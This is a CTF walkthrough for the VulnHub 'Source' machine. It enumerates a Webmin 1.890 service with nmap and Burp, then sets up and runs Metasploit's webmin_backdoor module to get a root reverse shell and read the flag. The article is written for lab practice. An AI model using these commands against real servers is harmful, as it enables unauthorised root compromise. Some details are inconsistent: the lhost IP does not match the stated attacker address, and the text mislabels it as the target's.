In this article, we will solve a Capture the Flag (CTF) challenge that was posted on the VulnHub website by an author named darkstar7471. Per the description given by the author, this is an entry-level CTF.

The target of this CTF is to get to the root of the machine and read the flag file. The compressed OVA file of the CTF can be downloaded here.

You can download the machine and run it on VirtualBox or VMWare. The torrent downloadable URL is also available for this VM and has been added in the reference section of this article. Prerequisites would be having some knowledge of Linux commands and ability to run some basic pentesting tools.

For those who are not aware of the site, VulnHub is a well-known website for security researchers which aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. You can download vulnerable machines from this website and try to exploit them. There are a lot of other challenging CTF exercises available on vulnhub.com and I highly suggest attempting them, as it is a good way to sharpen your skills and learn new techniques in a safe environment.

Please note: For all these machines, I have used Oracle VirtualBox to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

The steps

  1. Getting the target machine IP address by using the Netdiscover utility
  2. Identifying open ports with Nmap
  3. Enumerating HTTP service with Burp Suite
  4. Identifying exploit
  5. Configuring webmin exploit in Metasploit
  6. Exploiting and reading the root flag

The walkthrough

Step 1

The first step is to run the netdiscover command to identify the target machine IP address. In the screenshot given below, we can see that we have run netdiscover, which gives us the list of all the available IP addresses. [CLICK IMAGES TO ENLARGE]

Command used: netdiscover

The output of the netdiscover command shows all the available connected network devices. We checked each device one by one and the highlighted one was identified as our target machine IP address. Since some of the connected devices are our personal devices, we hide the MAC addresses by adding the black line. The target machine IP address is 192.168.1.22 and we will be using 192.168.1.27 as an attacker machine IP address where we have configured our Kali Linux.

Please note: The target and attacker machine IP addresses may be different in every case, as they are being assigned by the DHCP as per your network configuration.

Step 2

After getting the target machine IP address, the next step is to identify the open ports and services available on the machine. In order to do this, we conducted a nmap port scan. We also used the -sV option, which shows all the running version of the services. The Nmap results can be seen in the screenshot given below.

Command used: nmap -sV 192.168.1.22

As can be seen in the highlighted area of the above screenshot, we first ran the Nmap scan without the –Pn option; this was not completed, and we got a message that our target machine is blocking our ping probes. Nmap has also suggested that we use the -Pn option.

Let’s try to understand the scenario: By default, Nmap used a ping request for port scanning, but ping packets are sometimes blocked on servers. In that case, we can use the -Pn option, which tells Nmap to use TCP packets for the port scan.

In the second highlighted command, we used the -Pn option and our scan was completed. It shows two open ports. The first open port is 22, which is being used for SSH, and the second open port is10000, which is running HTTP service. We will enumerate the HTTP service in the next step.

Step 3

I opened the HTTP service in the browser.

As can be seen in the above screenshot, we got an error saying that this website is running in SSL mode and we have to run it as https://source:10000. In order to open this application into the browser, we have to map the IP address with the domain name by adding a line in the host file, as illustrated in the following screenshot.

Command used:

  1. echo “192.168.1.22 source” >> /etc/hosts
  2. cat /etc/hosts

The first command is used for mapping the IP address to the source and the second command is used for viewing the host’s file after making the changes in the host file.

The green highlighted line shows that we have made the changes in the host file. Now we can open the by clicking on the URL:

As the self-signed SSL certificated was configured in our target machine, it first opened the warning page, which we accepted. After that, it redirected us on a Webmail login page. As a preliminary enumeration step first, we tried some default usernames and passwords, which did not work.

Then we put the proxy up in the browser and started Burp Suite in order to analyze the request and responses. This can be seen in the below screenshot.

During the analysis, we found the Webmin server version name, which can be seen in the highlighted area of the above screenshot. The running version was MiniServ 1.890.

Step 4

We previously discovered the running version of Webmin. So, we searched for an exploit on Google. The result can be seen in the following screenshot.

As can be seen in the highlighted area of the above screenshot, the first Google result shows that our target application is vulnerable for removing code execution and working exploit is available on the ExploitDB website:

As per the information given on the ExploitDB website, this exploit is available in Metasploit. It means we don’t need to download the exploit. From here, we can directly launch Metasploit and run the exploit, which we will do in the next step.

Step 5

Kali Linux comes with preconfigured Metasploit Framework. This means we do not need to install and configure Metasploit; we can simply run the Metasploit CLI by typing the msfconsole command in the terminal:

Command used: msfconsole

As can be seen in the above screenshot, Metasploit has started. We use the search command to search the exploits in the Metasploit framework:

Command used: search “Webmin”

The search command output can be seen in the above screenshot. It returns five results, and some of them are the exploits and auxiliary modules. We will be using the webmin_backdoor exploit, as suggested by the ExploitDB website. We have also highlighted this exploit with a green line.

Command used:

  1. use exploit/linux/http/webmin_backdoor
  2. show options

As per the above screenshot, we can see that we used the use command to set up the exploit in the msfconsole. After that, we used the show options command, which shows all the required fields that need to be configured in the exploit to run. The output shows all the available options, with some of them being required and rest of them being optional settings. In the next screenshot, we will set up all the required options.

Command used:

  1. set rhosts 192.168.1.22
  2. set SSL true
  3. set lhost 192.168.1.24
  4. show options

As can be seen in the above screenshot, we have configured all of the required options in the exploit as follows:

  1. The first command is used to configure the target machine IP address in the exploit.
  2. As we know that our target machine application is running over HTTPS, the second command is used to enable the SSL in the exploit.
  3. The third command is used for configuring the reverse connection, so we have given our target machine IP address. It means when the exploit is successful, it will give the reverse shell connection on our target Kali machine.

After configuring all the options, we ran the show options command again in order to check whether all the required options are properly configured or not. The output shows that our exploit is properly configured, and in the next step, we will run it.

Step 6

Until now, we have configured our exploit in the Metasploit framework. Now it’s time to exploit it. However, some exploits also support the check command, which actually does not exploit but only check whether our target is vulnerable for this exploit or not. So first, we ran the check command.

The output of the check command shows that our target is vulnerable. Now we can run the exploit command, which gives us the reverse connection. It can be seen in the below screenshot.

Command used:

  1. check
  2. exploit

We have the shell connection of the target machine. so, we ran the id command to verify the access and privileges. The output of the id command tells us that we got the root access, which can be seen in the below screenshot.

Command used: id

The target of the CTF is to get the root access (which we already got by running the exploit) and reading the flag file (which should be in the root folder).

Command used: cat /root/root.txt

First, we changed our working directory to root directory and then we used the cat command to read the flag file, which completes this CTF.

I hope you like this article and enjoyed learning this machine!

 

Sources

Webmin 1.920 – Unauthenticated Remote Code Execution (Metasploit), ExploitDB

SOURCE: 1, VulnHub

Download SOURCE: 1, VulnHub

Download SOURCE: 1, VulnHub (torrent)